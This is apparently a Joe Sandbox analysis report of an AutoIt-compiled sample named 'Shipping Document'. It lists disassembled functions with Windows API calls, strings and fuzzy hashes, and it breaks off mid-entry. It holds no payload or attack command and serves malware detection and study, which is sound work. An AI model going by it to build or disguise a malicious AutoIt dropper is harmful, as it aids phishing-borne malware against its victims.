CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FC297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FC2990
GetClientRect.USER32(00000000,000000FF), ref: 00FC29AE
GetStockObject.GDI32(00000011), ref: 00FC29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC29D5

Part of subcall function 00FC2344: GetCursorPos.USER32(?), ref: 00FC2357
Part of subcall function 00FC2344: ScreenToClient.USER32(010867B0,?), ref: 00FC2374
Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000001), ref: 00FC2399
Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000002), ref: 00FC23A7

SetTimer.USER32(00000000,00000000,00000028,00FC1256), ref: 00FC29FC

Strings

AutoIt v3 GUI, xrefs: 00FC2974

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: be777b317f3788a4b4d5e51a86fd282298a6aa2e02f37fbcc6f9f3e37486f889
Instruction ID: 0d69264aa33b7c29492c8b44fcc978ae17a4398bc8131ba5f6b649f1fae04ff5
Opcode Fuzzy Hash: be777b317f3788a4b4d5e51a86fd282298a6aa2e02f37fbcc6f9f3e37486f889
Instruction Fuzzy Hash: F8B18075A0020BEFDB24DF68DA85FAD7BB4FF08310F114219FA55E6294DB799800DB90

Function 01044069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010440F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010441B6

Strings

SELECTALL, xrefs: 0104421D
FINDITEM, xrefs: 01044329
GETITEMCOUNT, xrefs: 01044128
SELECTINVERT, xrefs: 01044286
GETSELECTED, xrefs: 010442E4
DESELECT, xrefs: 010442A4
GETSELECTEDCOUNT, xrefs: 01044199
SELECT, xrefs: 01044250
SELECTCLEAR, xrefs: 01044235
ISSELECTED, xrefs: 010441C1
GETTEXT, xrefs: 0104415F
GETSUBITEMCOUNT, xrefs: 01044141
VIEWCHANGE, xrefs: 01044375

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: fa7cce0dfed28b756ac9d0e972ced77ab06ad44c0824ebceaee5280b9cb8dd4f
Instruction ID: a50686ae4ef0dbd1f30517b3439c90ce8ee5614afab6c3b64e69a0e286e1b561
Opcode Fuzzy Hash: fa7cce0dfed28b756ac9d0e972ced77ab06ad44c0824ebceaee5280b9cb8dd4f
Instruction Fuzzy Hash: C5A18E702143029BCB14EF24CE92F6AB7E5BF84314F04896CA8D69B692DF78EC05CB51

Function 010352F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 01035309
LoadCursorW.USER32(00000000,00007F8A), ref: 01035314
LoadCursorW.USER32(00000000,00007F00), ref: 0103531F
LoadCursorW.USER32(00000000,00007F03), ref: 0103532A
LoadCursorW.USER32(00000000,00007F8B), ref: 01035335
LoadCursorW.USER32(00000000,00007F01), ref: 01035340
LoadCursorW.USER32(00000000,00007F81), ref: 0103534B
LoadCursorW.USER32(00000000,00007F88), ref: 01035356
LoadCursorW.USER32(00000000,00007F80), ref: 01035361
LoadCursorW.USER32(00000000,00007F86), ref: 0103536C
LoadCursorW.USER32(00000000,00007F83), ref: 01035377
LoadCursorW.USER32(00000000,00007F85), ref: 01035382
LoadCursorW.USER32(00000000,00007F82), ref: 0103538D
LoadCursorW.USER32(00000000,00007F84), ref: 01035398
LoadCursorW.USER32(00000000,00007F04), ref: 010353A3
LoadCursorW.USER32(00000000,00007F02), ref: 010353AE
GetCursorInfo.USER32(?), ref: 010353BE
GetLastError.KERNEL32(00000001,00000000), ref: 010353E9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: dfe7195430f015a13c50b1e10f55b0612a5bfc8861ebe5aa45ec5b904f47ebc3
Instruction ID: 89d4e85903ac44d87f5df2d23e7f531e632e38c10c91681963b4aaabecd764af
Opcode Fuzzy Hash: dfe7195430f015a13c50b1e10f55b0612a5bfc8861ebe5aa45ec5b904f47ebc3
Instruction Fuzzy Hash: 07414370E083196ADB109FBA8C49D6EFFFCEF91B50F10452FA549E7290DAB89501CE51

Function 0101AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0101AAA5
__swprintf.LIBCMT ref: 0101AB46
_wcscmp.LIBCMT ref: 0101AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0101ABAE
_wcscmp.LIBCMT ref: 0101ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0101AC21
GetDlgCtrlID.USER32(?), ref: 0101AC73
GetWindowRect.USER32(?,?), ref: 0101ACA9
GetParent.USER32(?), ref: 0101ACC7
ScreenToClient.USER32(00000000), ref: 0101ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0101AD48
_wcscmp.LIBCMT ref: 0101AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0101AD82
_wcscmp.LIBCMT ref: 0101AD96

Part of subcall function 00FE386C: _iswctype.LIBCMT ref: 00FE3874

Strings

%s%u, xrefs: 0101AB40

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: b40fe44c3c9401b351865be3e338d3c823f10f3f72cd9851e25eec1560ac9ec9
Instruction ID: 4c25d6ce40bf311e5cedfdae06e5b88ee5491c36bb69bc2df0374a00cc74b773
Opcode Fuzzy Hash: b40fe44c3c9401b351865be3e338d3c823f10f3f72cd9851e25eec1560ac9ec9
Instruction Fuzzy Hash: 3EA1FD71305686EFD715EE68C884BAABBE8FF04315F404629FADAC3185DB38E545CB90

Function 0101B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0101B3DB
_wcscmp.LIBCMT ref: 0101B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0101B414
CharUpperBuffW.USER32(?,00000000), ref: 0101B431
_wcscmp.LIBCMT ref: 0101B44F
_wcsstr.LIBCMT ref: 0101B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0101B498
_wcscmp.LIBCMT ref: 0101B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0101B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0101B518
_wcscmp.LIBCMT ref: 0101B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0101B550
GetWindowRect.USER32(00000004,?), ref: 0101B5B9

Strings

ThumbnailClass, xrefs: 0101B4A3, 0101B523
@, xrefs: 0101B3BC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: a5c5cc9d25db6483d906456cfbb9c3972d2f3f97fb97a03f30798b1c00aae8d7
Instruction ID: 3b2d5cbdfcc2f533e27be158888341f6280ff5605d4e7b6f688c59c39263b865
Opcode Fuzzy Hash: a5c5cc9d25db6483d906456cfbb9c3972d2f3f97fb97a03f30798b1c00aae8d7
Instruction Fuzzy Hash: 4081CF710083069BEB11DF19C985FAA7BE8FF44314F0885A9FDC58A09ADB3CD945CBA1

Function 0101B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0101B23F

Strings

ALL, xrefs: 0101B2D3
REGEXP=, xrefs: 0101B254
[ALL, xrefs: 0101B2E5
[LAST, xrefs: 0101B2EC
HANDLE=, xrefs: 0101B238
[REGEXPTITLE:, xrefs: 0101B267
ACTIVE, xrefs: 0101B21A
LAST, xrefs: 0101B204
[CLASS:, xrefs: 0101B28F
[HANDLE:, xrefs: 0101B24B
CLASSNAME=, xrefs: 0101B27C
[ACTIVE, xrefs: 0101B22C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 03ffda5206e49e52c39fe8bd22c036e83557175aee52a5b539162df8f8493fa6
Instruction ID: bf906cc2b85eecad6fcafa485073fe077dfd7d20649641ce320a98287874de22
Opcode Fuzzy Hash: 03ffda5206e49e52c39fe8bd22c036e83557175aee52a5b539162df8f8493fa6
Instruction Fuzzy Hash: C131A031A44306A6DB10FA62CE47FEEB7B4AF14B60F60012DF481760D6EF6D6E08D955

Function 0101C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0101C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0101C4E6
SetWindowTextW.USER32(?,?), ref: 0101C4FD
GetDlgItem.USER32(?,000003EA), ref: 0101C512
SetWindowTextW.USER32(00000000,?), ref: 0101C518
GetDlgItem.USER32(?,000003E9), ref: 0101C528
SetWindowTextW.USER32(00000000,?), ref: 0101C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0101C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0101C569
GetWindowRect.USER32(?,?), ref: 0101C572
SetWindowTextW.USER32(?,?), ref: 0101C5DD
GetDesktopWindow.USER32 ref: 0101C5E3
GetWindowRect.USER32(00000000), ref: 0101C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0101C636
GetClientRect.USER32(?,?), ref: 0101C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0101C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0101C693

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 692f594a158804cb9672937444fb4852770d93d56d4f3b643630bed89ec1fb3b
Instruction ID: 33180d19443c83411e0a6bccd0a359586ad4b3cd8428632e810c370006c227aa
Opcode Fuzzy Hash: 692f594a158804cb9672937444fb4852770d93d56d4f3b643630bed89ec1fb3b
Instruction Fuzzy Hash: CA51617094070AAFEB20DFA8DE85B6EBBF5FF04705F004958E686A25A4C779E944CB50

Function 0104A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104A4C8
DestroyWindow.USER32(?,?), ref: 0104A542

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0104A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0104A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104A5F1
DestroyWindow.USER32(00000000), ref: 0104A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FC0000,00000000), ref: 0104A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104A663
GetDesktopWindow.USER32 ref: 0104A67C
GetWindowRect.USER32(00000000), ref: 0104A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0104A6B3

Part of subcall function 00FC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FC25EC

Strings

tooltips_class32, xrefs: 0104A5B5, 0104A643
0, xrefs: 0104A4DE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 4af28a1ce099683c55e639ac04736e7f4fe32ccf03a8e4ab79ca9443ca73c36d
Instruction ID: 379f638d7d0791fe695189d67530a9cbefdf5f0ca7d2b084e298ca55d927f94e
Opcode Fuzzy Hash: 4af28a1ce099683c55e639ac04736e7f4fe32ccf03a8e4ab79ca9443ca73c36d
Instruction Fuzzy Hash: 0C717CB5244205EFE720DF28C885F6A7BE5FB88300F44456DFAC687251D776E905CB61

Function 0104C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

DragQueryPoint.SHELL32(?,?), ref: 0104C917

Part of subcall function 0104ADF1: ClientToScreen.USER32(?,?), ref: 0104AE1A
Part of subcall function 0104ADF1: GetWindowRect.USER32(?,?), ref: 0104AE90
Part of subcall function 0104ADF1: PtInRect.USER32(?,?,0104C304), ref: 0104AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0104C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0104C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0104C9AE
_wcscat.LIBCMT ref: 0104C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0104C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0104CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0104CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0104CA47
DragFinish.SHELL32(?), ref: 0104CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0104CB41

Strings

@GUI_DROPID, xrefs: 0104CA6E
@GUI_DRAGFILE, xrefs: 0104CAF0
@GUI_DRAGID, xrefs: 0104CAB9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 7686ffa40c8619a5f466819e55ce0e2d384d3397c85455c2ecab49ffd4a4cf34
Instruction ID: 79c2c68db08e8154ebe8f7ea3773b94a54181c4a0e08bfb491f225bf4299e55d
Opcode Fuzzy Hash: 7686ffa40c8619a5f466819e55ce0e2d384d3397c85455c2ecab49ffd4a4cf34
Instruction Fuzzy Hash: 8A619CB1108302AFC710EF64CD85E9FBBE8EF88750F000A1DF5D5961A1DB759A09DB92

Function 01044619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010446AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010446F6

Strings

GETITEMCOUNT, xrefs: 010447D8
GETTEXT, xrefs: 01044849
GETSELECTED, xrefs: 01044806
GETTOTALCOUNT, xrefs: 010446DD
CHECK, xrefs: 01044716
EXISTS, xrefs: 0104475F
EXPAND, xrefs: 010447A8
ISCHECKED, xrefs: 01044879
UNCHECK, xrefs: 010448D2
SELECT, xrefs: 010448A7
COLLAPSE, xrefs: 0104473C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: a616b81e21b381446c0072b1f3d165300f043a4ca174a81118ce3a28eec86230
Instruction ID: 98a90872809e7599f46cb850fa78923eef203ceceb95bc0116ab3f20e3c96c05
Opcode Fuzzy Hash: a616b81e21b381446c0072b1f3d165300f043a4ca174a81118ce3a28eec86230
Instruction Fuzzy Hash: 67919F746043029BCB14EF14C891B6DB7E1BF94314F0044ACA8D69B7A2CF79ED4ADB41

Function 0102A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

CharLowerBuffW.USER32(?,?), ref: 0102A636
GetDriveTypeW.KERNEL32 ref: 0102A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102A730

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

Strings

wait, xrefs: 0102A6ED
close, xrefs: 0102A63C
open, xrefs: 0102A65D
open , xrefs: 0102A692
type cdaudio alias cd wait, xrefs: 0102A6AE
close cd wait, xrefs: 0102A71B
set cd door , xrefs: 0102A6D1
closed, xrefs: 0102A64A, 0102A653

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 896c4c2724268be7f426ef14c606eb71465ef82120f3ae939f85c170c377532f
Instruction ID: 791e93c8ea47caa3f78d35661c0aa968f3c2393ef3697ee42d99e153ad594963
Opcode Fuzzy Hash: 896c4c2724268be7f426ef14c606eb71465ef82120f3ae939f85c170c377532f
Instruction Fuzzy Hash: DE5129716043069FC710EF25CD82D6AB7E4FF88718F04495CF89A97251DB39AE09DB51

Function 0102A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0102A47A
__swprintf.LIBCMT ref: 0102A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0102A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0102A4FE
_memset.LIBCMT ref: 0102A51D
_wcsncpy.LIBCMT ref: 0102A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0102A58E
CloseHandle.KERNEL32(00000000), ref: 0102A599
RemoveDirectoryW.KERNEL32(?), ref: 0102A5A2
CloseHandle.KERNEL32(00000000), ref: 0102A5AC

Strings

\, xrefs: 0102A4B2
\??\%s, xrefs: 0102A496
:, xrefs: 0102A4BD

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 9401c972ef9423836056ddecb8503b2332a9877aaf62978ecc3890b5e1754d6d
Instruction ID: ef987a842248cc86656e45d6cde76b37c474024b90152a616632af4b8cb2472c
Opcode Fuzzy Hash: 9401c972ef9423836056ddecb8503b2332a9877aaf62978ecc3890b5e1754d6d
Instruction Fuzzy Hash: F631D2B560012AABDB219FA4DC88FEB77BCEF88701F1041B6FA48D3055EB7493448B24

Function 0102DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0102DC7B
_wcscat.LIBCMT ref: 0102DC93
_wcscat.LIBCMT ref: 0102DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0102DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 0102DCCE
GetFileAttributesW.KERNEL32(?), ref: 0102DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 0102DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 0102DD12

Strings

*.*, xrefs: 0102DD51

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: f698f4c8425d69a178e1001cf494dd09d1adeb2479c2e03a885bf7eb5f4b0311
Instruction ID: aea918371ce5fd2f03f6f7b17f131b9b11ee4c6a71cb96f24016393e9790a27f
